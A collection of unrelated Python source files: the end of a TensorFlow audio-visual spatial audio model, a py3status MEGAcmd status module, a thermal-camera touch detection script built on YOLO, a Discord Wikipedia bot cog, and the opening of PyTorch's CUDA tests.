tf.reduce_sum(stft_dist_ps * mask_channels, axis=0) / num_masked * 100. metrics['stft/avg'] = tf.reduce_mean(stft_dist) for i, ch in zip(range(3), 'YZX'): metrics['stft/'+ch] = stft_dist[i] lsd_ps = self._lsd_ops(targets_t, preds_t, window, overlap) lsd = tf.reduce_sum(lsd_ps * mask_channels, axis=0) / num_masked metrics['lsd/avg'] = tf.reduce_mean(lsd) for i, ch in zip(range(3), 'YZX'): metrics['lsd/'+ch] = lsd[i] mse_ps = self._temporal_mse_ops(targets_t, preds_t) mse = tf.reduce_sum(mse_ps * mask_channels, axis=0) / num_masked * 5e3 metrics['mse/avg'] = tf.reduce_mean(mse) for i, ch in zip(range(3), 'YZX'): metrics['mse/'+ch] = mse[i] snr_ps = self._temporal_snr_ops(targets_t, preds_t) snr = tf.reduce_sum(snr_ps * mask_channels, axis=0) / num_masked metrics['snr/avg'] = tf.reduce_mean(snr) for i, ch in zip(range(3), 'YZX'): metrics['snr/'+ch] = snr[i] metrics['pow/pred'] = tf.reduce_sum(tf.reduce_mean(tf.reduce_mean(preds_t ** 2, axis=2), axis=0)) metrics['pow/gt'] = tf.reduce_sum(tf.reduce_mean(tf.reduce_mean(targets_t ** 2, axis=2), axis=0)) for m in metrics: print(' * {:15s} | {:20s} | {:10s}'.format(m, str(metrics[m].get_shape()), str(metrics[m].dtype))) return metrics, stft_dist_ps, lsd_ps, mse_ps, snr_ps def loss_ops(self, metrics_t, step_t): losses = OrderedDict() losses['stft/mse'] = metrics_t['stft/avg'] return losses def audio_encoder_ops(self, stft): n_filters = [32, 64, 128, 256, 512] filter_size = [(7, 16), (3, 7), (3, 5), (3, 5), (3, 5)] stride = [(4, 8), (2, 4), (2, 2), (1, 1), (1, 1)] inp_dim = 95. # Encoder Dim=1 ss = (self.snd_contx / 2.) * (4. / self.wind_size) ss = int(ss - (inp_dim - 1) / 2.) tt = (self.snd_contx / 2. + self.snd_dur) * (4. / self.wind_size) tt = int(tt + (inp_dim - 1) / 2.) tt = int((np.ceil((tt - ss - inp_dim) / 16.)) * 16 + inp_dim + ss) sz = stft.get_shape().as_list() stft = tf.transpose(stft[:, :, ss:tt, :], (0,2,3,1)) print(' * {:15s} | {:20s} | {:10s}'.format('Crop', str(stft.get_shape()), str(stft.dtype))) x = tf.abs(stft) print(' * {:15s} | {:20s} | {:10s}'.format('Magnitude', str(x.get_shape()), str(x.dtype))) downsampling_l = [x] for l, nf, fs, st in zip(range(len(n_filters)), n_filters, filter_size, stride): name = 'conv{}'.format(l+1) x = tfw.conv_2d(x, nf, fs, padding='VALID', activation_fn=tf.nn.relu, stride=st, name=name) downsampling_l.append(x) print(' * {:15s} | {:20s} | {:10s}'.format(name, str(x.get_shape()), str(x.dtype))) return downsampling_l def visual_encoding_ops(self, inp, is_training=True, finetune=False, scope=None): vid_units = 512 inp_shape = tuple(inp.get_shape().as_list()) print(' * {:15s} | {:20s} | {:10s}'.format('Input', str(inp.get_shape()), str(inp.dtype))) x = tf.reshape(inp, shape=(inp_shape[0]*inp_shape[1],) + inp_shape[2:]) print(' * {:15s} | {:20s} | {:10s}'.format('Reshape', str(x.get_shape()), str(x.dtype))) cnn = ResNet18() x, ends = cnn.inference_ops(x, finetune, truncate_at='conv5_2') init_ops = cnn.restore_pretrained(inp_shape[-1], scope) self.init_ops.extend(init_ops) self.ends.update([(scope+'/'+key, val) for key, val in ends.iteritems()]) return x def bottleneck_ops(self, x_enc, use_audio=True): if len(x_enc) == 0: return None bottleneck = [] audio_sz = x_enc[AUDIO][-1].get_shape().as_list() for k in [AUDIO, VIDEO, FLOW]: if k == AUDIO and not use_audio: continue if k in x_enc: x = x_enc[k][-1] if k == AUDIO else x_enc[k] print(' * {:15s} | {:20s} | {:10s}'.format(k+'-feats', str(x.get_shape()), str(x.dtype))) if k != AUDIO: name = k+'-fc-red' x = tfw.fully_connected(x, 128, activation_fn=tf.nn.relu, name=name) print(' * {:15s} | {:20s} | {:10s}'.format(name, str(x.get_shape()), str(x.dtype))) sz = x.get_shape().as_list() out_shape = (sz[0], sz[1], sz[2]*sz[3]) if k == AUDIO else (sz[0], 1, sz[1]*sz[2]*sz[3]) x = tf.reshape(x, out_shape) print(' * {:15s} | {:20s} | {:10s}'.format(k+'-reshape', str(x.get_shape()), str(x.dtype))) name = k+'-fc' n_units = 1024 if k == AUDIO else 512 x = tfw.fully_connected(x, n_units, activation_fn=tf.nn.relu, name=name) print(' * {:15s} | {:20s} | {:10s}'.format(name, str(x.get_shape()), str(x.dtype))) if k in [VIDEO, FLOW]: x = tf.tile(x, (1, audio_sz[1], 1)) print(' * {:15s} | {:20s} | {:10s}'.format(k+' tile', str(x.get_shape()), str(x.dtype))) bottleneck.append(x) bottleneck = tf.concat(bottleneck, 2) print(' * {:15s} | {:20s} | {:10s}'.format('Concat', str(bottleneck.get_shape()), str(bottleneck.dtype))) return bottleneck def localization_ops(self, x): num_out = (self.ambi_order + 1) ** 2 - self.ambi_order ** 2 num_in = self.ambi_order ** 2 # Localization for i, u in enumerate(self.params.loc_fc_units): name = 'fc{}'.format(i+1) x = tfw.fully_connected(x, u, activation_fn=tf.nn.relu, name=name) print(' * {:15s} | {:20s} | {:10s}'.format(name, str(x.get_shape()), str(x.dtype))) # Compute localization weights name = 'fc{}'.format(len(self.params.loc_fc_units)+1) x = tfw.fully_connected( x, num_out*num_in*(self.params.sep_num_tracks+1), activation_fn=None, weights_initializer=tf.truncated_normal_initializer(stddev=0.001), weight_decay=0, name=name) # BS x NF x NIN x NOUT sz = x.get_shape().as_list() x = tf.reshape(x, (sz[0], sz[1], num_out, num_in, self.params.sep_num_tracks+1)) print(' * {:15s} | {:20s} | {:10s}'.format(name, str(x.get_shape()), str(x.dtype))) sz = x.get_shape().as_list() x = tf.tile(tf.expand_dims(x, 2), (1, 1, self.snd_dur/sz[1], 1, 1, 1)) x = tf.reshape(x, (sz[0], self.snd_dur, sz[2], sz[3], sz[4])) print(' * {:15s} | {:20s} | {:10s}'.format('Tile', str(x.get_shape()), str(x.dtype))) weights = x[:, :, :, :, :-1] print(' * {:15s} | {:20s} | {:10s}'.format('weights', str(weights.get_shape()), str(weights.dtype))) biases = x[:, :, :, :, -1] print(' * {:15s} | {:20s} | {:10s}'.format('biases', str(biases.get_shape()), str(biases.dtype))) return weights, biases def separation_ops(self, mono, stft, audio_enc, feats, scope='separation'): if self.separation == NO_SEPARATION: ss = self.snd_contx / 2 x_sep = mono[:, :, ss:ss + self.snd_dur] # BS x 1 x NF x_sep = tf.expand_dims(x_sep, axis=1) self.ends[scope + '/' + 'all_channels'] = x_sep print(' * {:15s} | {:20s} | {:10s}'.format('Crop Audio', str(x_sep.get_shape()), str(x_sep.dtype))) return x_sep elif self.separation == FREQ_MASK: n_filters = [32, 64, 128, 256, 512] filter_size = [(7, 16), (3, 7), (3, 5), (3, 5), (3, 5)] stride = [(4, 8), (2, 4), (2, 2), (1, 1), (1, 1)] name = 'fc-feats' feats = tfw.fully_connected(feats, n_filters[-1], activation_fn=tf.nn.relu, name=name) print(' * {:15s} | {:20s} | {:10s}'.format(name, str(feats.get_shape()), str(feats.dtype))) sz = feats.get_shape().as_list() enc_sz = audio_enc[-1].get_shape().as_list() feats = tf.tile(tf.expand_dims(feats, 2), (1, 1, enc_sz[2], 1)) feats = tf.reshape(feats, (sz[0], sz[1], enc_sz[2], sz[2])) print(' * {:15s} | {:20s} | {:10s}'.format('Tile', str(feats.get_shape()), str(feats.dtype))) x = tf.concat([audio_enc[-1], feats], axis=3) print(' * {:15s} | {:20s} | {:10s}'.format('Concat', str(x.get_shape()), str(x.dtype))) # Up-convolution n_chann_in = mono.get_shape().as_list()[1] for l, nf, fs, st, l_in in reversed(zip(range(len(n_filters)), [self.params.sep_num_tracks*n_chann_in,]+n_filters[:-1], filter_size, stride, audio_enc[:-1])): name = 'deconv{}'.format(l+1) x = tfw.deconv_2d(x, nf, fs, stride=st, padding='VALID', activation_fn=None, name=name) print(' * {:15s} | {:20s} | {:10s}'.format(name, str(x.get_shape()), str(x.dtype))) if l == 0: break x = tf.concat((tf.nn.relu(x), l_in), 3) print(' * {:15s} | {:20s} | {:10s}'.format('Concat', str(x.get_shape()), str(x.dtype))) # Crop ss = np.floor((self.snd_contx / 2. - self.wind_size) * (4. / self.wind_size)) tt = np.ceil((self.snd_contx / 2. + self.snd_dur + self.wind_size) * (4. / self.wind_size)) inp_dim = 95. # Encoder Dim=1 skip = (self.snd_contx / 2.) * (4. / self.wind_size) skip = int(skip - (inp_dim - 1) / 2.) stft = stft[:, :, int(ss):int(tt)] print(' * {:15s} | {:20s} | {:10s}'.format('Crop STFT', str(stft.get_shape()), str(stft.dtype))) x = x[:, int(ss-skip):int(tt-skip), :] print(' * {:15s} | {:20s} | {:10s}'.format('Crop deconv1', str(x.get_shape()), str(x.dtype))) x = tf.transpose(x, (0, 3, 1, 2)) print(' * {:15s} | {:20s} | {:10s}'.format('Permute', str(x.get_shape()), str(x.dtype))) x_sz = x.get_shape().as_list() x = tf.reshape(x, (x_sz[0], n_chann_in, -1, x_sz[2], x_sz[3])) print(' * {:15s} | {:20s} | {:10s}'.format('Reshape', str(x.get_shape()), str(x.dtype))) # Apply Mask f_mask = tf.cast(tf.sigmoid(x), dtype=tf.complex64) print(' * {:15s} | {:20s} | {:10s}'.format('Sigmoid', str(f_mask.get_shape()), str(f_mask.dtype))) stft_sep = tf.expand_dims(stft, 2) * f_mask print(' * {:15s} | {:20s} | {:10s}'.format('Prod', str(stft_sep.get_shape()), str(stft_sep.dtype))) # IFFT x_sep = myutils.istft(stft_sep, 4) print(' * {:15s} | {:20s} | {:10s}'.format('ISTFT', str(x_sep.get_shape()), str(x_sep.dtype))) ss = self.snd_contx / 2. skip = np.floor((self.snd_contx / 2. - self.wind_size) * (4. / self.wind_size)) * (self.wind_size / 4.) skip += 3. * self.wind_size / 4. # ISTFT ignores 3/4 of a window x_sep = x_sep[:, :, :, int(ss-skip):int(ss-skip)+self.snd_dur] print(' * {:15s} | {:20s} | {:10s}'.format('Crop', str(x_sep.get_shape()), str(x_sep.dtype))) else: raise ValueError('Unknown separation mode.') self.ends[scope + '/' + 'all_channels'] = x_sep return x_sep def inference_ops(self, audio, video=None, flow=None, is_training=True): audio = tf.transpose(audio, (0, 2, 1)) # BATCH_SIZE x N_CHANNELS x N_FRAMES tensors = [audio, video, flow] names = ['audio', 'video', 'flow'] print('Inputs') for t, n in zip(tensors, names): if t is not None: self.ends[n] = t print(' * {:15s} | {:20s} | {:10s}'.format(n, str(t.get_shape()), str(t.dtype))) # STFT (0.025s windows, 25% hop) print('\nSTFT') stft = myutils.stft(audio, self.wind_size, 4) print(' * {:15s} | {:20s} | {:10s}'.format('Mono', str(audio.get_shape()), str(audio.dtype))) print(' * {:15s} | {:20s} | {:10s}'.format('STFT', str(stft.get_shape()), str(stft.dtype))) x_enc = {} # Audio encoder if AUDIO in self.encoders: print('\nAudio encoder') scope = 'audio_encoder' with tf.variable_scope(scope): x_enc[AUDIO] = self.audio_encoder_ops(stft) # Video encoder if VIDEO in self.encoders: print('\nVideo encoder') scope = 'video_encoder' with tf.variable_scope(scope): x_enc[VIDEO] = self.visual_encoding_ops( video, is_training=is_training, finetune=True, scope=scope) # Flow encoder if FLOW in self.encoders: print('\nFlow encoder') scope = 'flow_encoder' with tf.variable_scope(scope): x_enc[FLOW] = self.visual_encoding_ops( flow, is_training=is_training, finetune=True, scope=scope) # Mixer print('\nBottleneck') scope = 'bottleneck' with tf.variable_scope(scope): feats = self.bottleneck_ops(x_enc, AUDIO in self.encoders) # Localization coefficients scope = 'localization' print('\n Localization') with tf.variable_scope(scope): weights, biases = self.localization_ops(feats) self.loc_channels = [weights, biases] # Source separation scope = 'separation' print('\n Separation') with tf.variable_scope(scope): x_sep = self.separation_ops(audio, stft, x_enc[AUDIO] if len(x_enc) else None, feats, scope) self.sep_channels = x_sep self.inp_spect = tf.abs(stft) # Decode ambisonics scope = 'decoder' print('\n Ambix Generation') x_sep = tf.transpose(x_sep, (0, 3, 1, 2)) print(' * {:15s} | {:20s} | {:10s}'.format('Input Audio', str(x_sep.get_shape()), str(x_sep.dtype))) print(' * {:15s} | {:20s} | {:10s}'.format('Input Weights', str(weights.get_shape()), str(weights.dtype))) print(' * {:15s} | {:20s} | {:10s}'.format('Input Biases', str(biases.get_shape()), str(biases.dtype))) with tf.variable_scope(scope): # Predict ambisonics (A_t = W_t*s_t + b_t) x_ambi = tf.reduce_sum(tf.reduce_sum(weights * tf.expand_dims(x_sep, axis=2), axis=4), axis=3) + biases[:,:,:,0] self.ends[scope + '/ambix'] = x_ambi print(' * {:15s} | {:20s} | {:10s}'.format('Ambix', str(x_ambi.get_shape()), str(x_ambi.dtype))) return x_ambi
py
7df9f2be5d3b9dfe578f73877ee22b7a69607991
# -*- coding: utf-8 -*- """ Display status of MEGAcmd. Configuration parameters: cache_timeout: refresh interval for this module (default 10) format: display format for the module (default "MEGA {format_sync}|No MEGA") format_sync: display format for every sync (default "{syncstate}") format_sync_separator: show separator if more than one sync (default " ") Format placeholders: {format_sync} Format for every sync returned by 'mega-sync' command. format_sync placeholders: Any column returned by 'mega-sync' command - in lower case! For example: id, syncstate, localpath Requires: MEGAcmd: command-line interface for MEGA @author Maxim Baz (https://github.com/maximbaz) @license BSD SAMPLE OUTPUT {'full_text': 'MEGA Synced'} """ STRING_NOT_INSTALLED = "MEGAcmd is not installed" class Py3status: """ """ # available configuration parameters cache_timeout = 10 format = "MEGA {format_sync}|No MEGA" format_sync = "{syncstate}" format_sync_separator = " " def post_config_hook(self): if not self.py3.check_commands("mega-sync"): raise Exception(STRING_NOT_INSTALLED) def mega_sync(self): output = self.py3.command_output("mega-sync").splitlines() format_sync = None if len(output) > 0: columns = output[0].lower().split() megasync_data = [] for line in output[1:]: cells = dict(zip(columns, line.split())) megasync_data.append(self.py3.safe_format(self.format_sync, cells)) format_sync_separator = self.py3.safe_format(self.format_sync_separator) format_sync = self.py3.composite_join(format_sync_separator, megasync_data) return { "cached_until": self.py3.time_in(self.cache_timeout), "full_text": self.py3.safe_format( self.format, {"format_sync": format_sync} ), } if __name__ == "__main__": """ Run module in test mode. """ from py3status.module_test import module_test module_test(Py3status)
py
7df9f3cf83c5f77142e54d48cef2e32e2f7d435b
#!/usr/bin/env python #Copyright 2017 Martin Cooney #This file is subject to the terms and conditions defined in file 'Readme.md', which is part of this source code package. import numpy as np import cv2 from subprocess import call import sys import math #-------------------------------------------------------- # Setup #-------------------------------------------------------- #Some default alignment parameters for the default dataset of touching objects: #(please replace these with your own parameters if using different data) shiftx = 38 shifty = 0 zoomFactorX = 0 zoomFactorY = 20 alpha = 0.7 shiftUp = 60 #Object parameters #For the dataset the following five items were used: #(please change if you use different data) groundTruthObjects = [ ] groundTruthLocations = [ ] groundTruthObjects.append("PET bottle") groundTruthObjects.append("ceramic cup") groundTruthObjects.append("paper box") groundTruthObjects.append("HDPE bottle") groundTruthObjects.append("glass") groundTruthLocations.append((227, 205)) groundTruthLocations.append((192, 207)) groundTruthLocations.append((153, 197)) groundTruthLocations.append((118, 182)) groundTruthLocations.append((77, 199)) #Detection parameters PADDING_PARAMETER = 0.35 #used to remove part of the bounding boxes of detected objects, which often are rough and contain background along the perimeters SD_THRESHOLD = 10 #used to detect if an object has varied temperature, which could be the result of a touch INTENSITY_THRESHOLD = 20 #used to select the lighter (warmest) part within a bounding box AREA_THRESHOLD = 10 #used to remove small dots of noise APPROXIMATION_THRESHOLD = 0.03 #used for approximating the shape of touches to compute the surface to area ratio SURFACE_AREA_THRESHOLD = 0.6 #used to remove long thin noise along the outlines of objects (from reflections or warm/cold backgrounds) #Other parameters width = 320 height = 240 #get passed arguments and select filenames: #please change these as needed to match where folders are on your system basename = sys.argv[0] beforeBaseName = sys.argv[1] conditionName = sys.argv[2] correctAnswer = int (sys.argv[3]) rgbFileName1 = "%s/%s_rgb.jpg" % (basename, beforeBaseName) thermalFileName1 = "%s/%s_thermal_obj.jpg" % (basename, beforeBaseName) thermalFileName2 = "%s/%s_thermal.jpg" % (basename, beforeBaseName) shifted_RGB_filename = '../../data/objects/my_rgb_shifted.jpg' objectDetectionResults_filename = '../../output/object_detection_results.txt' darknetFolder = '../../../../darknet/' outputLogFileName = '../../output/%s_resultsLogFile.dat' % conditionName outputImageFilename = "../../data/objects/output/out_%s.jpg" % beforeBaseName #read in images to process image_rgb = cv2.imread(rgbFileName1) image_rgb = cv2.resize(image_rgb, (width, height)) image_thermal = cv2.imread(thermalFileName1) image_thermal = cv2.resize(image_thermal, (width, height)) #align mask and rgb for both before and after shifted_rgb = image_rgb[shifty+zoomFactorY:240-zoomFactorY, 0+zoomFactorX:320-shiftx-zoomFactorX] shifted_rgb = cv2.resize(shifted_rgb, (width, height)) shifted_thermal = image_thermal[0+shiftUp:240-shifty, shiftx:320] shifted_thermal = cv2.resize(shifted_thermal, (width, height)) #to store predictions touchedItems = [ ] print "" print "= Detect object touches in a single frame (MAY 2017) =" print beforeBaseName #-------------------------------------------------------- # Detect objects #-------------------------------------------------------- #Call YOLO/Darknet cv2.imwrite(shifted_RGB_filename, shifted_rgb) yoloCommand = "%sdarknet detect %scfg/yolo.cfg %syolo.weights %s" % (darknetFolder, darknetFolder, darknetFolder, shifted_RGB_filename) call(yoloCommand, shell=True) #read in the object detection results file, which describes every object in 6 lines f = open(objectDetectionResults_filename, 'r') l = list(f) f.close() totalLines = len(l) numberOfObjects = totalLines/6 objectNames = [] boxCentroids = [] boxSizes = [] print "Detected", numberOfObjects, "objects" for currentObjectIndex in range(numberOfObjects): objectLabel = l[currentObjectIndex*6].rstrip() guessProb = l[currentObjectIndex*6+1].rstrip() centerX = float(l[currentObjectIndex*6+2]) centerY = float(l[currentObjectIndex*6+3]) sizeX = float(l[currentObjectIndex*6+4]) sizeY = float(l[currentObjectIndex*6+5]) objectNames.append(objectLabel) boxCentroids.append([centerX, centerY]) boxSizes.append([sizeX, sizeY]) #-------------------------------------------------------- # Detect touches in the object regions #-------------------------------------------------------- #make mask image from bounding boxes gray_therm = cv2.cvtColor(shifted_thermal, cv2.COLOR_BGR2GRAY) for currentObjectIndex in range(len(boxCentroids)): currentObj = objectNames[currentObjectIndex] if currentObj != "person" and currentObj != "diningtable" and currentObj != "chair" and currentObj != "sofa": centerX = boxCentroids[currentObjectIndex][0] centerY = boxCentroids[currentObjectIndex][1] sizeX = boxSizes[currentObjectIndex][0] sizeY = boxSizes[currentObjectIndex][1] p1_x = int((centerX-(sizeX/2))*width) p1_y = int((centerY-(sizeY/2))*height) p2_x = int((centerX+(sizeX/2))*width) p2_y = int((centerY+(sizeY/2))*height) boundingBoxRegion = gray_therm[p1_y:p2_y, p1_x:p2_x] reducedBoundingBoxRegion = boundingBoxRegion.copy() cv2.rectangle(reducedBoundingBoxRegion, (0, 0), ((p2_x-p1_x), (p2_y- p1_y)), 0, thickness=10) cv2.rectangle(reducedBoundingBoxRegion, (0, 0), ((p2_x-p1_x), int(float(p2_y-p1_y) * PADDING_PARAMETER)), 0, thickness=-1) ret1, thresholdedImage1 = cv2.threshold(reducedBoundingBoxRegion, 2, 255, cv2.THRESH_BINARY) (means, stds) = cv2.meanStdDev(reducedBoundingBoxRegion, mask = thresholdedImage1) print currentObj, " Mean: ", means[0][0], " SD: ", stds[0][0] if stds[0][0] > SD_THRESHOLD: print " SD high. Possibly a touch." ret2, thresholdedImage2 = cv2.threshold(reducedBoundingBoxRegion, (means[0][0] + INTENSITY_THRESHOLD), 255, cv2.THRESH_BINARY) #(_, cnts, _) = cv2.findContours(thresholdedImage2.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) #use this line for OPENCV 3... (cnts, _) = cv2.findContours(thresholdedImage2.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) #use this line for OPENCV 2.4 if len(cnts) > 0: for cnt in cnts: theArea = cv2.contourArea(cnt) print " Area: ", theArea if theArea > AREA_THRESHOLD: # approximate the contour peri = cv2.arcLength(cnt, True) approx = cv2.approxPolyDP(cnt, APPROXIMATION_THRESHOLD * peri, True) surfaceToArea = peri/theArea print " Surface to area ratio: ", surfaceToArea if surfaceToArea < SURFACE_AREA_THRESHOLD: print " Touch predicted." #draw the touch contour boundingBoxRegion_rgb2 = shifted_rgb[p1_y:p2_y, p1_x:p2_x] cv2.drawContours(boundingBoxRegion_rgb2, [cnt], -1, 255, -1) shifted_rgb[p1_y:p2_y, p1_x:p2_x] = boundingBoxRegion_rgb2 #find the centroid of the touch and draw mom = cv2.moments(cnt) centroid_x = int(mom['m10']/mom['m00']) centroid_y = int(mom['m01']/mom['m00']) centroid_x = centroid_x + p1_x centroid_y = centroid_y + p1_y cv2.circle(shifted_rgb, (centroid_x, centroid_y), 3, (0, 0, 255)) #find closest box centroid minDistance = 9999.9 closestObjectId = -1 for anObjectIndex in range(len(groundTruthLocations)): anObject = groundTruthObjects[anObjectIndex] if anObject == "person" or anObject == "diningtable" or anObject == "chair" or anObject == "sofa": continue c_x = groundTruthLocations[anObjectIndex][0] c_y = groundTruthLocations[anObjectIndex][1] cv2.circle(shifted_rgb, (c_x, c_y), 3, (0, 255, 0)) currentDistance = math.sqrt((centroid_x - c_x)*(centroid_x - c_x) + (centroid_y - c_y)*(centroid_y - c_y)) if currentDistance < minDistance: minDistance = currentDistance closestObjectId = anObjectIndex print " Closest Object Id: ", closestObjectId print " Object Name: ", groundTruthObjects[closestObjectId] cv2.putText(shifted_rgb, groundTruthObjects[closestObjectId], (10, 20), cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 0)) touchedItems.append(closestObjectId) else: print " Shape not round. Probably not a touch." else: print " Small area. Probably not a touch." resultsLogFile = open(outputLogFileName, 'a') #-------------------------------------------------------- # Output results #-------------------------------------------------------- if len(touchedItems) == 1: print "one touch detected" lineToWrite = "%s %d %d \n" % (beforeBaseName, correctAnswer, touchedItems[0]+1) resultsLogFile.write(lineToWrite) else: #if no touches or multiple touches detected, output -1 and show the array print "No touches or multiple touches detected" lineToWrite = "%s %d -1 %s \n" % (beforeBaseName, correctAnswer, touchedItems) resultsLogFile.write(lineToWrite) resultsLogFile.close() cv2.imwrite(outputImageFilename, shifted_rgb) print ""
py
7df9f54ed191972d06e0566065968a2915efbecf
import discord, wikipedia from discord.ext import commands from discord.ext.commands import cooldown, BucketType, CommandOnCooldown, guild_only from wikipedia.wikipedia import search class Wikipedia(commands.Cog): def __init__(self, client): self.client = client @commands.command(aliases=("Wikipedia_menu", "Wiki_menu", "wiki_menu")) @guild_only() async def wikipedia_menu(self, ctx): if ctx.message.author.is_on_mobile(): embed = discord.Embed(title="Wikipedia menu (but for mobile)", description="if you want to search up an article, you can now!", color = discord.Colour.dark_red()) embed.set_footer(text=f"Command by {ctx.message.author.name}", icon_url=ctx.message.author.avatar_url) embed.add_field(name="1️⃣wiki_summary", value="**It is a quick (or long) summary on the article you type in**") embed.add_field(name="2️⃣wiki_search", value="**I recommend using this command first so that way you can understand what to type in correctly**") embed.add_field(name="3️⃣wiki_page", value="**this is a risky command mostly because it will more than likely exceed 6000 characters, but if you know it won't; you can use it :D**") await ctx.send(embed=embed) return embed = discord.Embed(title="Wikipedia menu", description="if you want to search up an article, you can now!", color = discord.Colour.dark_red()) embed.set_footer(text=f"Command by {ctx.message.author.name}", icon_url=ctx.message.author.avatar_url) embed.add_field(name="wiki_summary", value="It is a quick (or long) summary on the article you type in") embed.add_field(name="wiki_search", value="I recommend using this command first so that way you can understand what to type in correctly") embed.add_field(name="wiki_page", value="this is a risky command mostly because it will more than likely exceed 6000 characters, but if you know it won't; you can use it :D") await ctx.send(embed=embed) return @commands.command(aliases=("Wiki_search", "Wikipedia_search", "wikipedia_search")) @guild_only() async def wiki_search(self, ctx, *, search=""): if search == "" or search == " ": await ctx.send("you didn't put anything to search for") if ctx.message.channel.id == 693942287910305842: final = "" lst = wikipedia.search(search) for i in lst: final += i + "\n" await ctx.send("a list of articles:" + "\n" + "```" + "\n" + final + "```") else: await ctx.send(f"this command is only allowed in <#693942287910305842>") return @cooldown(1, 10, BucketType.user) @commands.command() @guild_only() async def wiki_summary(self, ctx, * , search=""): if search == "" or search == " ": await ctx.send("it seems you didn't put anything in your search") return if ctx.message.channel.id == 693942287910305842: try: summary = wikipedia.summary(search) page = wikipedia.page(search) await ctx.send("```\n" + summary + "```") except wikipedia.exceptions.DisambiguationError: await ctx.send("wasn't able to find what you were looking for, try using `wiki_search` to list a few, and copy/paste it into here") except wikipedia.exceptions.PageError: await ctx.send("couldn't find the page you were looking for :pensive:") except wikipedia.exceptions.RedirectError: await ctx.send("RedirectError bro, try again..?") except wikipedia.exceptions.WikipediaException: await ctx.send("I got a weird exception that isn't recognizable by the code, ping wiki about his problem pls") await ctx.send("unless you were missing an argument, then don't ping him") finally: await ctx.send(page.url) else: await ctx.send("you must go to <#693942287910305842> to use this command") return @wiki_summary.error async def wiki_summary_error(self, ctx, error): if isinstance(error, CommandOnCooldown): await ctx.send(f"{ctx.message.author.mention} sorry but you're on cooldown for {error.retry_after:,.f} seconds") return @cooldown(1, 10, BucketType.user) @commands.command() @guild_only() async def wiki_page(self, ctx, *, search=""): if search == "" or search == " ": await ctx.send("it seems you didn't put anything in your search") return if ctx.message.channel.id == 693942287910305842: try: page = wikipedia.page(search) await ctx.send("```\n" + page.content + "\n```") except wikipedia.exceptions.DisambiguationError: await ctx.send("wasn't able to find what you were looking for, try using `wiki_search` to list a few, and copy/past it into here") except wikipedia.exceptions.PageError: await ctx.send("couldn't find the page you were looking for :pensive:") except wikipedia.exceptions.RedirectError: await ctx.send("RedirectError bro, try again..?") except wikipedia.exceptions.WikipediaException: await ctx.send("I got a weird exception that isn't recognizable by the code, ping wiki about his problem pls") finally: await ctx.send(page.url) else: await ctx.send("sorry but you can only use this command in <#693942287910305842> ") return @wiki_page.error async def wiki_page_error(self, ctx, error): if isinstance(error, CommandOnCooldown): await ctx.send(f"sorry but you're on cooldown {ctx.message.author.mention} for {error.retry_after:,.f} seconds") return def setup(client): client.add_cog(Wikipedia(client))
py
7df9f637274cb3b5f801445a7a5915ed3e9209b7
# Owner(s): ["module: cuda"] from itertools import repeat, chain, product from typing import NamedTuple import collections import contextlib import ctypes import gc import io import pickle import queue import sys import tempfile import threading import unittest import torch import torch.cuda import torch.cuda.comm as comm from torch.nn.parallel import scatter_gather from torch.utils.checkpoint import checkpoint_sequential from torch._six import inf, nan from torch.testing._internal.common_methods_invocations import tri_tests_args, tri_large_tests_args, \ _compare_trilu_indices, _compare_large_trilu_indices from torch.testing._internal.common_utils import TestCase, freeze_rng_state, run_tests, \ NO_MULTIPROCESSING_SPAWN, skipIfRocm, load_tests, IS_REMOTE_GPU, IS_SANDCASTLE, IS_WINDOWS, \ slowTest, skipCUDANonDefaultStreamIf, skipCUDAMemoryLeakCheckIf, TEST_WITH_ROCM, TEST_NUMPY, \ get_cycles_per_ms from torch.testing._internal.autocast_test_lists import AutocastTestLists # load_tests from common_utils is used to automatically filter tests for # sharding on sandcastle. This line silences flake warnings load_tests = load_tests # We cannot import TEST_CUDA and TEST_MULTIGPU from torch.testing._internal.common_cuda here, # because if we do that, the TEST_CUDNN line from torch.testing._internal.common_cuda will be executed # multiple times as well during the execution of this test suite, and it will # cause CUDA OOM error on Windows. TEST_CUDA = torch.cuda.is_available() TEST_MULTIGPU = TEST_CUDA and torch.cuda.device_count() >= 2 if not TEST_CUDA: print('CUDA not available, skipping tests', file=sys.stderr) TestCase = object # noqa: F811 TEST_LARGE_TENSOR = TEST_CUDA TEST_MEDIUM_TENSOR = TEST_CUDA TEST_CUDNN = TEST_CUDA TEST_BF16 = False if TEST_CUDA: torch.ones(1).cuda() # initialize cuda context TEST_CUDNN = TEST_CUDA and (TEST_WITH_ROCM or torch.backends.cudnn.is_acceptable(torch.tensor(1., device=torch.device('cuda:0')))) TEST_LARGE_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 12e9 TEST_MEDIUM_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 6e9 TEST_BF16 = torch.cuda.is_bf16_supported() def make_sparse_tensor(t, n, *sizes): assert t.is_sparse tensor = t() i = tensor._indices() i = i.new(len(sizes), n).copy_( torch.cat([torch.LongTensor(1, n).random_(s) for s in sizes], 0)) v = tensor._values() v = v.new(n).copy_(torch.randn(n)) return t(i, v, torch.Size(sizes)) _cycles_per_ms = None class TestCuda(TestCase): _do_cuda_memory_leak_check = True _do_cuda_non_default_stream = True FIFTY_MIL_CYCLES = 50000000 def setUp(self): super(TestCuda, self).setUp() self.autocast_lists = AutocastTestLists(torch.device('cuda:0')) def tearDown(self): del self.autocast_lists super(TestCuda, self).tearDown() def _check_memory_stat_consistency(self): snapshot = torch.cuda.memory_snapshot() expected_each_device = collections.defaultdict(lambda: collections.defaultdict(int)) for segment in snapshot: expected = expected_each_device[segment["device"]] pool_str = segment["segment_type"] + "_pool" expected["segment.all.current"] += 1 expected["segment." + pool_str + ".current"] += 1 expected["allocated_bytes.all.current"] += segment["allocated_size"] expected["allocated_bytes." + pool_str + ".current"] += segment["allocated_size"] expected["reserved_bytes.all.current"] += segment["total_size"] expected["reserved_bytes." + pool_str + ".current"] += segment["total_size"] expected["active_bytes.all.current"] += segment["active_size"] expected["active_bytes." + pool_str + ".current"] += segment["active_size"] is_split = len(segment["blocks"]) > 1 for block in segment["blocks"]: if block["state"] == "active_allocated": expected["allocation.all.current"] += 1 expected["allocation." + pool_str + ".current"] += 1 if block["state"].startswith("active_"): expected["active.all.current"] += 1 expected["active." + pool_str + ".current"] += 1 if block["state"] == "inactive" and is_split: expected["inactive_split.all.current"] += 1 expected["inactive_split." + 